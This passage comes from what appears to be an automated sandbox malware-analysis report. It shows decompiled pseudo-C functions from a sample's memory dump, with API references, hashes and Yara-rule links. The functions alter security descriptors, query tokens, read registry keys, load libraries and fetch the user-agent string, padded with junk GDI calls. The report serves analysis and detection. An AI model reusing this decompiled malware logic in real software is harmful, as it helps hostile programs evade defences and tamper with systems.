						ArcTo(0, 0x60, 8, 0x52, 0x62, 0x10, 0xc, 0x47, 0x29);
						_t12 = _t29;
					} else {
						_t12 = 0;
					}
				} else {
					_t12 = 0;
				}
				return _t12;
			}

0x00ec2a25
0x00ec2a35
0x00ec2a40
0x00ec2a43
0x00ec2a45
0x00ec2a49
0x00ec2a53
0x00ec2a93
0x00ec2a55
0x00ec2a60
0x00ec2a63
0x00ec2a64
0x00ec2a6c
0x00ec2a6e
0x00ec2a6e
0x00ec2a73
0x00ec2a74
0x00ec2a77
0x00ec2a80
0x00ec2a89
0x00ec2a8e
0x00ec2aa6
0x00ec2aac
0x00ec2a4b
0x00ec2a4b
0x00ec2a4b
0x00ec2a27
0x00ec2a27
0x00ec2a27
0x00ec2ab2

APIs

IsValidCodePage.KERNELBASE(0000004C,73AFF520,00ED719D,00000000,?,?,00ECA07E,00ECA049,00000000,?,00000000), ref: 00EC2A45

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CodePageValid
String ID:
API String ID: 1911128615-0
Opcode ID: b53a59899442e944a284d86b50f78d120636bd9ae57107648c4297f3fb83051f
Instruction ID: f09dce4b2ea53364424fcf4f2c16af3390f5b6081db36c7dc6a4023b72a7f992
Opcode Fuzzy Hash: b53a59899442e944a284d86b50f78d120636bd9ae57107648c4297f3fb83051f
Instruction Fuzzy Hash: 5A010471684308BAEB307AA69E87FAA3798DB00B50F10203EF705BE1C1D6B39D418654

Uniqueness

Uniqueness Score: -1.00%

Function 00ECE3F5, Relevance: 4.6, APIs: 3, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00ECE3F5(void* __ecx) {
				int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				char _v24;
				char _t15;
				int _t22;
				intOrPtr _t23;
				intOrPtr _t29;
				int _t30;

				_t30 = 0;
				_t29 =  *0xef56a0; // 0x3c0
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t15 = E00ED3A82(__ecx, 0xc5e);
				_v24 = _t15;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(_t15, 1,  &_v8, 0);
				if(_t15 != 0) {
					_t22 = GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16);
					if(_t22 != 0) {
						__imp__SetSecurityInfo(_t29, 6, 0x10, 0, 0, 0, _v12); // executed
						if(_t22 == 0) {
							_t30 = 1;
						}
					}
					_t23 =  *0xef56d4; // 0x520f880
					 *((intOrPtr*)(_t23 + 0x10))(_v8);
				}
				E00ED0299( &_v24);
				return _t30;
			}

0x00ece3fc
0x00ece3ff
0x00ece40a
0x00ece40d
0x00ece410
0x00ece413
0x00ece416
0x00ece424
0x00ece427
0x00ece42f
0x00ece440
0x00ece448
0x00ece455
0x00ece45d
0x00ece45f
0x00ece45f
0x00ece45d
0x00ece463
0x00ece468
0x00ece468
0x00ece46f
0x00ece47a

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00EC2BF4,00000000), ref: 00ECE427
GetSecurityDescriptorSacl.ADVAPI32(00EC2BF4,?,?,?,?,?,?,?,00EC2BF4,?,?,00EF5770), ref: 00ECE440
SetSecurityInfo.ADVAPI32(000003C0,00000006,00000010,00000000,00000000,00000000,?,?,?,?,?,00EC2BF4,?,?,00EF5770), ref: 00ECE455

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Security$Descriptor$ConvertInfoSaclString
String ID:
API String ID: 1469150652-0
Opcode ID: 877d30c08a03a581b1520b1142f6759a7f81e87caaf612fa9c42dd612c434b07
Instruction ID: 385281270c8cf70b231e64c084c5b37ef9027b72a8ea371d3a034f09062008b2
Opcode Fuzzy Hash: 877d30c08a03a581b1520b1142f6759a7f81e87caaf612fa9c42dd612c434b07
Instruction Fuzzy Hash: F41115B2A00218AFDB209FA6DD49EEFBBBCFB04754F10045AB511F6150E6B19A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ECE716, Relevance: 4.5, APIs: 3, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00ECE716(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, DWORD* _a12) {
				long _v8;
				void* _v12;
				int _t12;
				void* _t13;
				int _t16;
				void* _t24;

				_push(_t19);
				_t24 = 0;
				_t12 = GetTokenInformation(_a4, _a8, 0, 0,  &_v8); // executed
				if(_t12 != 0 || GetLastError() != 0x7a) {
					L6:
					_t13 = _t24;
				} else {
					_t24 = E00ECD239(_v8);
					_v12 = _t24;
					if(_t24 != 0) {
						_t16 = GetTokenInformation(_a4, _a8, _t24, _v8, _a12); // executed
						if(_t16 != 0) {
							goto L6;
						} else {
							E00ECD1EA( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t13 = 0;
					}
				}
				return _t13;
			}

0x00ece71a
0x00ece727
0x00ece731
0x00ece735
0x00ece779
0x00ece779
0x00ece742
0x00ece74a
0x00ece74d
0x00ece752
0x00ece765
0x00ece769
0x00000000
0x00ece76b
0x00ece770
0x00000000
0x00ece776
0x00ece754
0x00ece754
0x00ece754
0x00ece754
0x00ece752
0x00ece77e

APIs

GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00001644,?,?,?,00ECE3C8,00000000,00000001,00000000,00001644), ref: 00ECE731
GetLastError.KERNEL32(?,?,?,00ECE3C8,00000000,00000001,00000000,00001644,?,?,?,00ECF066,00000000), ref: 00ECE737

Part of subcall function 00ECD239: RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,00ECF066,?,?,?,00ECE3C8,00000000,00000001,00000000,00001644), ref: 00ECE765

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: de9fe38f26160aca826680eb9998541e126293834fe3e77e7436d4ef02e942b8
Instruction ID: 0699b5725e714bceba9d0a05e2d219ad7aa8da0bb6c10aa0e26576480b31777b
Opcode Fuzzy Hash: de9fe38f26160aca826680eb9998541e126293834fe3e77e7436d4ef02e942b8
Instruction Fuzzy Hash: FD016276505148FB9F129BA2DD44D9F3FBEEB85750B10142EF905E6110E6329E129760

Uniqueness

Uniqueness Score: -1.00%

Function 00EC8412, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC8412(intOrPtr __edi, char _a4, intOrPtr _a8) {
				void* __ebx;
				void* __esi;
				int _t17;
				signed int _t19;
				signed int _t22;
				signed int _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;

				if(__edi == 0) {
					L4:
					return _t17 | 0xffffffff;
				} else {
					_t19 =  *0xef5788; // 0x2
					_t20 = _t19 << 5;
					_t1 = _t20 + 0x20; // 0x22
					if(E00ECD07F(_t1, 0xef5730, _t19 << 5) != 0) {
						_t29 =  *0xef5730; // 0x51f1628
						_t22 =  *0xef5788; // 0x2
						 *0xef5788 =  *0xef5788 + 1;
						_t23 = _t22 << 5;
						 *((intOrPtr*)(_t23 + _t29)) = __edi;
						_t30 =  *0xef5730; // 0x51f1628
						 *(_t23 + _t30 + 4) =  *(_t23 + _t30 + 4) & 0x00000000;
						_t31 =  *0xef5730; // 0x51f1628
						 *((intOrPtr*)(_t23 + _t31 + 0x18)) = _a8;
						_t32 =  *0xef5730; // 0x51f1628
						 *(_t23 + _t32 + 0xc) =  *(_t23 + _t32 + 0xc) & 0x00000000;
						_t33 =  *0xef5730; // 0x51f1628
						_t14 =  &_a4; // 0xef5770
						 *((intOrPtr*)(_t23 + _t33 + 8)) =  *_t14;
						_t17 = IsValidCodePage(0x5f); // executed
						goto L4;
					} else {
						_t24 = 0xfffffffe;
						return _t24;
					}
				}
			}

0x00ec8417
0x00ec848c
0x00ec8490
0x00ec8419
0x00ec8419
0x00ec841f
0x00ec8423
0x00ec8436
0x00ec843d
0x00ec8443
0x00ec844b
0x00ec8451
0x00ec8454
0x00ec8457
0x00ec845d
0x00ec8462
0x00ec8468
0x00ec846c
0x00ec8472
0x00ec8477
0x00ec847d
0x00ec8482
0x00ec8486
0x00000000
0x00ec8438
0x00ec843a
0x00ec843c
0x00ec843c
0x00ec8436

APIs

IsValidCodePage.KERNELBASE(0000005F,?,00EC81C1,00000001,00000172,00000000,00EF5770,?,?,?,00EC45EF), ref: 00EC8486

Strings

pW, xrefs: 00EC847D

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CodePageValid
String ID: pW
API String ID: 1911128615-488229394
Opcode ID: 0d0ca9ae6a6cff34af74a7d70892b50adfca3fe44ec6b3b460abd5eb482c4acc
Instruction ID: 85e17cd628039b9191f5b635a43a42444558992ed389897d37dae90415fa7356
Opcode Fuzzy Hash: 0d0ca9ae6a6cff34af74a7d70892b50adfca3fe44ec6b3b460abd5eb482c4acc
Instruction Fuzzy Hash: BB017132200604CFC314EF49E980E317BA5FBD4335B52815EEA18AB2E2DB31A956CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00EC8491, Relevance: 3.1, APIs: 2, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00EC8491() {
				struct HDC__* _v8;
				struct HDC__* _v12;
				signed int* _v16;
				char _v308;
				signed int* _t27;
				signed int* _t30;
				intOrPtr _t31;
				signed int* _t33;
				signed int _t34;
				void* _t36;
				signed int _t37;
				signed int* _t39;
				signed int* _t40;
				void* _t44;
				intOrPtr _t45;
				signed int* _t46;
				intOrPtr _t48;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				intOrPtr _t56;
				void* _t64;
				void* _t68;

				_t48 =  *0xef5790; // 0x609bbd21
				_t46 =  *0xef5794; // 0x0
				_t27 =  *0xef56ec; // 0x0
				_t51 =  *0xef56e8; // 0x609bbd5d
				_t49 = _t48 + 0x3c;
				asm("adc ecx, edi");
				_t45 = _t51;
				_v16 = _t27;
				_v12 = 0;
				_t54 = _t27 - _t46;
				if(_t54 >= 0 && (_t54 > 0 || _t51 > _t49)) {
					 *0xef5790 = _t51;
					 *0xef5794 = _t27;
					_v8 = 0;
					_t56 =  *0xef5788; // 0x2
					if(_t56 > 0) {
						_t52 = 0;
						do {
							_t30 =  *0xef5730; // 0x51f1628
							if( *((intOrPtr*)(_t30 + _t52)) != 0) {
								_t32 =  *((intOrPtr*)(_t30 + _t52 + 0x18));
								if( *((intOrPtr*)(_t30 + _t52 + 0x18)) <= 0) {
									L8:
									_t33 =  *0xef5730; // 0x51f1628
									_t46 = _t52 + _t33;
									if(_t46[1] == 0 || _t46[7] != 0) {
										_t34 =  *_t46;
										if(_t34 > 0) {
											asm("cdq");
											_t36 = _t34 * 0x3c + _t46[4];
											asm("adc edx, [ecx+0x14]");
											_t64 = _t49 - _v16;
											if(_t64 <= 0 && (_t64 < 0 || _t36 <= _t45)) {
												goto L14;
											}
										}
									} else {
										L14:
										_t37 = _t46[3];
										if(_t37 == 0) {
											E00EC53ED(_t46[2], 0, 0, 0); // executed
											_t53 = _t53 + 0x10;
										} else {
											 *_t37();
										}
										_t39 =  *0xef5730; // 0x51f1628
										 *((intOrPtr*)(_t52 +  &(_t39[4]))) = _t45;
										_t40 =  *0xef5730; // 0x51f1628
										 *(_t52 +  &(_t40[5])) = _v16;
										_t46 =  *0xef5730; // 0x51f1628
										 *((intOrPtr*)(_t52 +  &(_t46[7]))) = 1;
										_v12 = 1;
									}
								} else {
									_t44 = E00ED1931(_t46, _t49, _t32); // executed
									_pop(_t46);
									if(_t44 == 0) {
										goto L8;
									}
								}
							}
							_v8 = _v8 + 1;
							_t31 = _v8;
							_t52 = _t52 + 0x20;
							_t68 = _t31 -  *0xef5788; // 0x2
						} while (_t68 < 0);
					}
					_t27 =  &_v308;
					__imp__GetCPInfoExA(0x3f, 0x5d, _t27);
					if(_v12 != 0) {
						E00EC834A(); // executed
						return ArcTo(0, 9, 0x4a, 0x46, 0x1c, 0x2f, 4, 0x47, 0x48);
					}
				}
				return _t27;
			}

0x00ec849a
0x00ec84a0
0x00ec84a6
0x00ec84ad
0x00ec84b6
0x00ec84b9
0x00ec84bb
0x00ec84bd
0x00ec84c0
0x00ec84c3
0x00ec84c5
0x00ec84d5
0x00ec84db
0x00ec84e0
0x00ec84e3
0x00ec84e9
0x00ec84ef
0x00ec84f1
0x00ec84f1
0x00ec84f9
0x00ec84fb
0x00ec8501
0x00ec850e
0x00ec850e
0x00ec8513
0x00ec8519
0x00ec8520
0x00ec8524
0x00ec8529
0x00ec852a
0x00ec852d
0x00ec8530
0x00ec8533
0x00000000
0x00000000
0x00ec8533
0x00ec853b
0x00ec853b
0x00ec853b
0x00ec8540
0x00ec854c
0x00ec8551
0x00ec8542
0x00ec8542
0x00ec8542
0x00ec8554
0x00ec855c
0x00ec8560
0x00ec8565
0x00ec8569
0x00ec8572
0x00ec8576
0x00ec8576
0x00ec8503
0x00ec8504
0x00ec8509
0x00ec850c
0x00000000
0x00000000
0x00ec850c
0x00ec8501
0x00ec8579
0x00ec857c
0x00ec857f
0x00ec8582
0x00ec8582
0x00ec84f1
0x00ec858e
0x00ec8599
0x00ec85a2
0x00ec85a4
0x00000000
0x00ec85ba
0x00ec85a2
0x00ec85c4

APIs

GetCPInfoExA.KERNEL32(0000003F,0000005D,?), ref: 00EC8599
ArcTo.GDI32(00000000,00000009,0000004A,00000046,0000001C,0000002F,00000004,00000047,00000048), ref: 00EC85BA

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: aa1c4ad3a7eb451b29d75dab98083bba85ea48ac7462083ef4ea9f8eb1cb56c1
Instruction ID: 4f1361ff27dc373e617b17a2cc75933ac12e75431e856f0f8172207266df9682
Opcode Fuzzy Hash: aa1c4ad3a7eb451b29d75dab98083bba85ea48ac7462083ef4ea9f8eb1cb56c1
Instruction Fuzzy Hash: F331CF72A00A00EFD720EF49DF81E2977F5FB94708B60545EE204F6291E7B2E942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED050A, Relevance: 3.0, APIs: 2, Instructions: 30
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00ED050A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _t8;
				struct HINSTANCE__* _t10;
				void* _t15;
				void* _t20;

				_t8 = E00ED3A6B();
				_t20 = 0;
				_v8 = _t8;
				_push(_t8);
				if(_a12 != 0x6e2) {
					_t10 = LoadLibraryA(); // executed
				} else {
					_t10 = GetModuleHandleA();
				}
				if(_t10 != 0) {
					_t15 = E00ED04C4(_a8, _a4, _t10); // executed
					_t20 = _t15;
				}
				E00ED02B3( &_v8);
				return _t20;
			}

0x00ed0512
0x00ed0517
0x00ed0520
0x00ed0523
0x00ed0524
0x00ed0533
0x00ed0526
0x00ed0526
0x00ed0526
0x00ed0537
0x00ed0540
0x00ed0547
0x00ed0547
0x00ed054c
0x00ed0555

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,?,?,00EC3473), ref: 00ED0526
LoadLibraryA.KERNELBASE(00000000,00000000,?,?,00EC3473), ref: 00ED0533

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 71f7a037d8bde4c4ac8c821be6e5de998b256eaf3dcbdc32093f7313771ec17f
Instruction ID: 3875b9420dafaaa8c5effa005b65a3fd778b0bcdf9adfbbe8f1f735cec5fc039
Opcode Fuzzy Hash: 71f7a037d8bde4c4ac8c821be6e5de998b256eaf3dcbdc32093f7313771ec17f
Instruction Fuzzy Hash: F5F01C72505618AFDB10EF65EC059AA77E8EB00354B185126F805E6251DB70DE42CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00EC31EA, Relevance: 1.6, APIs: 1, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00EC31EA(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __fp0) {
				char _v44;
				intOrPtr _t6;
				signed int _t7;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				signed int _t13;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t25;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t37;

				_t45 = __fp0;
				_t37 = __esi;
				_t33 = __edx;
				_t32 = __ecx;
				_t31 = __ebx;
				_t6 =  *0xef56a8; // 0xf00000
				_t7 = E00ED1484(__fp0, 0, 0,  *((intOrPtr*)(_t6 + 0xac)), 0, 0); // executed
				 *0xef5758 = _t7;
				if(_t7 != 0) {
					_t8 =  *0xef56a8; // 0xf00000
					__eflags =  *((intOrPtr*)(_t8 + 0xa4)) - 1;
					if(__eflags == 0) {
						E00EDBFC9(_t32, __eflags, __fp0); // executed
					} else {
						E00EDC21E(__fp0); // executed
					}
					_t10 = E00EC35D1(_t31, __eflags); // executed
					 *0xef56cc = _t10;
					_t11 = _t10;
					__eflags = _t11;
					if(_t11 == 0) {
						_t12 = E00EC308B(_t45); // executed
						__eflags = _t12;
						if(__eflags < 0) {
							goto L12;
						}
						goto L11;
					} else {
						_t16 = _t11 - 1;
						__eflags = _t16;
						if(__eflags == 0) {
							L11:
							E00EDBFC9(_t32, __eflags, _t45); // executed
							E00EC32C4(__eflags);
							L12:
							_t13 = 0;
							__eflags = 0;
							goto L13;
						}
						_t17 = _t16 - 1;
						__eflags = _t17;
						if(_t17 != 0) {
							__eflags = _t17 - 1;
							if(__eflags == 0) {
								_t19 =  *0xef56a8; // 0xf00000
								_push(_t37);
								E00ECEE1F( &_v44, __eflags,  *((intOrPtr*)(_t19 + 0xac)) + 4);
								E00ECEF97( &_v44);
								_t25 =  *0xef56a8; // 0xf00000
								 *0xef56d0 = E00EC4D09(__eflags,  *((intOrPtr*)(_t25 + 0xac)), 0x1d4c0);
								E00EC36CD(_t33, _t45);
								E00EC32C4(__eflags);
								BitBlt(0, 0x13, 0x19, 0x32, 0x30, 0, 0x19, 0x47, 0x30);
							}
						}
						goto L12;
					}
				} else {
					_t13 = _t7 | 0xffffffff;
					L13:
					return _t13;
				}
			}

0x00ec31ea
0x00ec31ea
0x00ec31ea
0x00ec31ea
0x00ec31ea
0x00ec31ed
0x00ec3202
0x00ec320a
0x00ec3211
0x00ec321b
0x00ec3220
0x00ec3227
0x00ec3230
0x00ec3229
0x00ec3229
0x00ec3229
0x00ec3235
0x00ec323a
0x00ec323f
0x00ec323f
0x00ec3241
0x00ec32ac
0x00ec32b1
0x00ec32b3
0x00000000
0x00000000
0x00000000
0x00ec3243
0x00ec3243
0x00ec3243
0x00ec3244
0x00ec32b5
0x00ec32b5
0x00ec32ba
0x00ec32bf
0x00ec32bf
0x00ec32bf
0x00000000
0x00ec32bf
0x00ec3246
0x00ec3246
0x00ec3247
0x00ec3249
0x00ec324a
0x00ec324c
0x00ec3257
0x00ec325f
0x00ec3267
0x00ec326c
0x00ec3284
0x00ec3289
0x00ec328e
0x00ec32a3
0x00ec32a9
0x00ec324a
0x00000000
0x00ec3247
0x00ec3213
0x00ec3213
0x00ec32c1
0x00ec32c3
0x00ec32c3

APIs

BitBlt.GDI32(00000000,00000013,00000019,00000032,00000030,00000000,00000019,00000047,00000030), ref: 00EC32A3

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61270bd0765659d6483f2d77df2e484910651e04d81b1fe42381d1d765ec6341
Instruction ID: eca26702994f2dfd82764a136cfae8f8854420ba85ee37cf23fba87133d21d42
Opcode Fuzzy Hash: 61270bd0765659d6483f2d77df2e484910651e04d81b1fe42381d1d765ec6341
Instruction Fuzzy Hash: 1A113F31300640BFDA2577759E06FA636E8EF91708F06A42CF211F72F2D6529606C661

Uniqueness

Uniqueness Score: -1.00%

Function 00EC436F, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00EC436F(void* __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v12;
				char _v16;
				signed int* _t19;
				char _t20;
				short* _t21;
				char _t25;
				intOrPtr _t31;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t37;
				char _t44;

				_t39 = __ecx;
				_t19 =  &_v8;
				_t37 = 0;
				_v8 = _v8 & 0;
				__imp__ConvertSidToStringSidW(_a4, _t19);
				if(_t19 == 0) {
					return _t19;
				}
				_t20 = E00EC27B8(__ecx, 0x114);
				_push(0);
				_push(_v8);
				_v12 = _t20;
				_push("\\");
				_t21 = E00ECE9D2(_t20);
				E00ED0299( &_v12);
				_v12 = E00EC27B8(_t39, 0);
				_t25 = E00ED0556(_t21, _t24); // executed
				_t44 = _t25;
				_v16 = _t44;
				E00ED0299( &_v12);
				if(_t44 != 0) {
					_t33 =  *0xef56ac; // 0x520f8f8
					 *((intOrPtr*)(_t33 + 0x1c))(_t44);
					_push(_a12);
					_t35 =  *0xef56c8; // 0x520f6c8
					_push(_a8);
					_push(_t44);
					if( *((intOrPtr*)(_t35 + 0xa4))() != 0) {
						_t37 = 1;
					}
				}
				if(_v8 != 0) {
					_t31 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t31 + 0x34))(_v8);
				}
				E00ECD1EA( &_v16, 0xfffffffe);
				return _t37;
			}

0x00ec436f
0x00ec4376
0x00ec437d
0x00ec437f
0x00ec4382
0x00ec438a
0x00ec4424
0x00ec4424
0x00ec4396
0x00ec439b
0x00ec439d
0x00ec43a0
0x00ec43a3
0x00ec43a9
0x00ec43b4
0x00ec43c2
0x00ec43c5
0x00ec43ca
0x00ec43d0
0x00ec43d3
0x00ec43dd
0x00ec43df
0x00ec43e5
0x00ec43e8
0x00ec43eb
0x00ec43f0
0x00ec43f3
0x00ec43fc
0x00ec4400
0x00ec4400
0x00ec43fc
0x00ec4406
0x00ec440b
0x00ec4410
0x00ec4410
0x00ec4419
0x00000000

APIs

ConvertSidToStringSidW.ADVAPI32(?,000000FF), ref: 00EC4382

Part of subcall function 00ECE9D2: lstrcatW.KERNEL32(00000000,00000000), ref: 00ECEA12

Part of subcall function 00ED0556: RegOpenKeyExW.KERNELBASE(80000002,00000114,00000000,00020019,00EC9A80,73AFF520,000000FF,00000000,00000114,00EC9A80), ref: 00ED057A

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ConvertOpenStringlstrcat
String ID:
API String ID: 2016599580-0
Opcode ID: 804e15226baf5a601a7052b7f927852f1804392ca3d19cef8ef0fa6cee4a6b1b
Instruction ID: a3fdff21a67566bc6dedb36f6fb9c6c6c32f6121445dfcf94cc5bbd8e301aee5
Opcode Fuzzy Hash: 804e15226baf5a601a7052b7f927852f1804392ca3d19cef8ef0fa6cee4a6b1b
Instruction Fuzzy Hash: 1311B1B6901218BFCB11AFE4DD89FDE7BF8EF04311F10506AFA11F6191D6728A028B50

Uniqueness

Uniqueness Score: -1.00%

Function 00EC42B4, Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00EC42B4(void* __ecx, void* __esi, void* __fp0, char _a4, intOrPtr _a8) {
				char _v8;
				char _v40;
				char _v324;
				char _v844;
				char _v1364;
				void* __ebx;
				intOrPtr _t18;
				void* _t21;
				char _t25;
				char* _t27;
				void* _t32;
				char* _t38;

				_t40 = __ecx;
				_t18 =  *0xef56a8; // 0xf00000
				_t21 = E00EC436F(__ecx, __esi,  *((intOrPtr*)(_t18 + 0x644)) + _a4,  &_v1364, 0x104); // executed
				if(_t21 != 0) {
					E00ED0B78(__ecx,  &_v844); // executed
					_t38 =  &_v40;
					E00ED20A9(_t38, __eflags, __fp0, _a8);
					_t25 = E00EC27B8(_t40, 0x2ce);
					_push(0);
					_v8 = _t25;
					_push(_t38);
					_t27 = "\\";
					_push(_t27);
					_push(_v8);
					_push(_t27);
					_push( &_v844);
					_push(_t27);
					_a4 = E00ECE9D2( &_v1364);
					E00ED0299( &_v8);
					_t32 = E00EC4425(__eflags, _a4); // executed
					__eflags = _t32;
					if(_t32 >= 0) {
						__imp__GetCPInfoExA(0x41, 0x3c,  &_v324);
					} else {
						E00ECD1EA( &_a4, 0xfffffffe);
					}
					return _a4;
				} else {
					return _t21;
				}
			}

0x00ec42b4
0x00ec42c9
0x00ec42d8
0x00ec42e2
0x00ec42ee
0x00ec42f6
0x00ec42f9
0x00ec4303
0x00ec4308
0x00ec430a
0x00ec430f
0x00ec4310
0x00ec4315
0x00ec4316
0x00ec431f
0x00ec4320
0x00ec4321
0x00ec432e
0x00ec4335
0x00ec433d
0x00ec4346
0x00ec4348
0x00ec4364
0x00ec434a
0x00ec4350
0x00ec4356
0x00ec436e
0x00ec42e5
0x00ec42e5
0x00ec42e5

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ConvertString
String ID:
API String ID: 1685500029-0
Opcode ID: c8e62f0c5fb46d255ec0d66963b3489e0c378d7d74c99dbd9bf433d576322046
Instruction ID: d09a7f1a14246217bccc07cee66eecbdae0a291e836c2f3773c63594a1da3b5e
Opcode Fuzzy Hash: c8e62f0c5fb46d255ec0d66963b3489e0c378d7d74c99dbd9bf433d576322046
Instruction Fuzzy Hash: B31133B150020DBFDB01EBA8CD96FDE37ECAB54355F141069BA08FA191E671EB858B50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED332C, Relevance: 1.5, APIs: 1, Instructions: 41fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00EC9569,00000000,00EC98F4,?,00000000,00000000,00000000,00000001,?,00ED33D7,00000000,00000000,00EC9569,?,?,00EC98F4), ref: 00ED3363

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 3219adb5d5d798d6d2fe6436d67f830127da537fbe58ee34840306755aad1c83
Instruction ID: 8fe963c0cf86525b9003ae59eac873487b88e092df04a4e5c02b6322bc9821f8
Opcode Fuzzy Hash: 3219adb5d5d798d6d2fe6436d67f830127da537fbe58ee34840306755aad1c83
Instruction Fuzzy Hash: DEF03CB6500218FF8B21CFA9CD44CEF7BBCEB85654B514166F915EB210D630AB01DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00ED27AA, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00ED27AA() {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t13;
				intOrPtr* _t14;
				void* _t15;

				_t5 =  *0xef56bc; // 0x520feb8
				if( *_t5 == 0) {
					_v8 = E00ED3A6B();
					 *0xef576c = E00ECEA79(0, _t7);
					E00ED02B3( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t13 = E00ECD239(0x101);
					 *0xef576c = _t13;
					_t14 =  *0xef56bc; // 0x520feb8
					_t15 =  *_t14(0, _t13,  &_v8); // executed
					if(_t15 == 0) {
						L4:
						return 0;
					} else {
						return E00ECD1EA(0xef576c, 0xffffffff) | 0xffffffff;
					}
				}
			}

0x00ed27ae
0x00ed27b6
0x00ed27fe
0x00ed2809
0x00ed2812
0x00000000
0x00ed27b8
0x00ed27bd
0x00ed27c4
0x00ed27cf
0x00ed27d4
0x00ed27db
0x00ed27df
0x00ed2817
0x00ed281a
0x00ed27e1
0x00ed27f3
0x00ed27f3
0x00ed27df

APIs

Part of subcall function 00ECD239: RtlAllocateHeap.NTDLL(00000008,?,?,00ECE8D2,00000100,?,00EC33EA), ref: 00ECD247

ObtainUserAgentString.URLMON(00000000,00000000,00000100), ref: 00ED27DB

Part of subcall function 00ECD1EA: RtlFreeHeap.NTDLL(00000000,00000000,00000114), ref: 00ECD230

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Heap$AgentAllocateFreeObtainStringUser
String ID:
API String ID: 471734292-0
Opcode ID: 1c4bb84cecb1f334414f953313791903cc1f3689b5c6f6551d733f80c47c9aef
Instruction ID: 394149f50a6e85eb879685557696997cc0c83bb456acb30db6e1897d807c3179
Opcode Fuzzy Hash: 1c4bb84cecb1f334414f953313791903cc1f3689b5c6f6551d733f80c47c9aef
Instruction Fuzzy Hash: 26F04F72605604EFE705EBB5ED06B5D33E8DB10364F24526FE221F62E1EAB1DA05DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00ECE397, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ECE397(void* __ecx, void* _a4) {
